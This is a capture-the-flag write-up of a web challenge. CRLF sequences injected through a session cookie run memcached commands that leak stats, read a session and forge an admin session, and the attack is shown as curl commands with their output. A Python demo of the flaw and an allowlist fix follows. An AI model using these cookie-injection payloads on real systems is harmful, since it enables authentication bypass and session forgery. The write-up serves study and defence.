# Login As Admin!(2)

| http://login2.chal.mmactf.link/ | Web | 200 points |
|---------------------------------|-----|------------|

This challenge, at first, didn't seem vulnerable. Using the test credentials that were provided, we see that a random token is assigned to the user in a cookie named `ss`.

I finally stumbled onto something interesting when I submitted a request with the cookie `ss` present but with an empty value.

```
$ curl "http://login2.chal.mmactf.link/" --cookie "ss="
[...]
MemcacheError:ERROR
[...]
```

So it is using Memcache. Maybe it is injectable. In Memcached, commands are separated by a newline. Let's give it a shot.

```
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=%0d%0astats"
MemcacheError:ERROR
STAT pid 2524
STAT uptime 262912
STAT time 1441757879
STAT version 1.4.14 (Ubuntu)
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 16.020000
STAT rusage_system 36.012000
STAT curr_connections 5
[...]
END
```

At this point, I figured that the cookie that is given to the user is used as a key in the database which tells who the user is.

```
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=%0d%0aget 770e33cbe1d236a5233adacd95995e2f8ca71a21b65eb756d7f894647b6168c2"
[...]
{"username":"test"}
[...]
```

To become admin, we'll make our own session token with the `admin` username.

```
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=%0d%0aset adminkey 0 3600 20%0d%0a{\"username\":\"admin\"}"
STORED
```

Finally, let's query the website.

```
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=adminkey"
You are "admin" user.
Flag is "MMA{61016d84e70e0b5ed5c03e4e398c3571}"
```
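The root cause here is that the URL-decoded cookie is pasted straight into a memcached text-protocol line, so a CRLF in the cookie terminates the `get` and whatever follows runs as a further command. The following is an added example, not code from the writeup or the challenge: a constructed in-memory stand-in for memcached that understands only `get`, `set` and `stats`, the vulnerable session lookup beside a hardened one, and an assumed token format (64 lowercase hex characters, matching the sample token above) used as the allowlist.

```python
import re
from typing import List, Optional
from urllib.parse import unquote


class FakeMemcached:
    """Constructed stand-in for a memcached server speaking the text protocol.

    Commands are separated by CRLF, exactly the property the injection relies on.
    Only get / set / stats are implemented, which is enough for the demonstration.
    """

    def __init__(self) -> None:
        # Constructed session entry: token -> JSON blob naming the user.
        self.store = {"a" * 64: '{"username":"test"}'}

    def execute(self, raw: str) -> List[str]:
        """Run every CRLF-separated command in `raw`; return one reply per command."""
        lines = raw.split("\r\n")
        replies: List[str] = []
        i = 0
        while i < len(lines):
            parts = lines[i].split()
            i += 1
            if not parts:
                continue
            cmd, args = parts[0], parts[1:]
            if cmd == "get" and args:
                chunks = [
                    f"VALUE {k} 0 {len(self.store[k].encode())}\r\n{self.store[k]}"
                    for k in args if k in self.store
                ]
                replies.append("\r\n".join(chunks + ["END"]))
            elif cmd == "set" and len(args) == 4:
                # set <key> <flags> <exptime> <bytes>, followed by a data line
                key, nbytes = args[0], int(args[3])
                data = lines[i] if i < len(lines) else ""
                i += 1
                if len(data.encode()) != nbytes:
                    replies.append("CLIENT_ERROR bad data chunk")
                else:
                    self.store[key] = data
                    replies.append("STORED")
            elif cmd == "stats":
                replies.append("STAT version 1.4.14 (constructed)\r\nEND")
            else:
                # memcached answers an unknown or malformed command with ERROR,
                # which is the "MemcacheError:ERROR" seen in the writeup.
                replies.append("ERROR")
        return replies


def lookup_session_unsafe(server: FakeMemcached, cookie_value: str) -> List[str]:
    """The pattern the challenge exploits: the web stack URL-decodes the cookie,
    and the decoded value is interpolated directly into the protocol line."""
    token = unquote(cookie_value)
    return server.execute(f"get {token}\r\n")


# Assumed token format (not stated by the challenge): 64 lowercase hex characters.
TOKEN_RE = re.compile(r"[0-9a-f]{64}")


def lookup_session_safe(server: FakeMemcached, cookie_value: str) -> Optional[List[str]]:
    """Allowlist the token before it reaches memcached.

    memcached's own key rule (at most 250 bytes, no whitespace or control
    characters) would also have blocked this, but a strict format check is
    simpler to reason about and fails closed for anything unexpected.
    """
    token = unquote(cookie_value)
    if not TOKEN_RE.fullmatch(token):
        return None  # malformed token: treat as unauthenticated, never send it
    return server.execute(f"get {token}\r\n")


if __name__ == "__main__":
    srv = FakeMemcached()
    print(lookup_session_unsafe(srv, "%0d%0astats"))   # second command runs
    print(lookup_session_safe(srv, "%0d%0astats"))     # None: rejected before memcached
```

Running the module shows the unsafe path returning two replies for a single cookie (the `ERROR` from the truncated `get` followed by the `STAT` output), while the safe path returns `None` without the server ever seeing the injected line. The same check stops the `set` variant, because a CRLF can never match the allowlist.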

Original writeup (https://gist.github.com/Becojo/d84ff959281aea7e4ad4).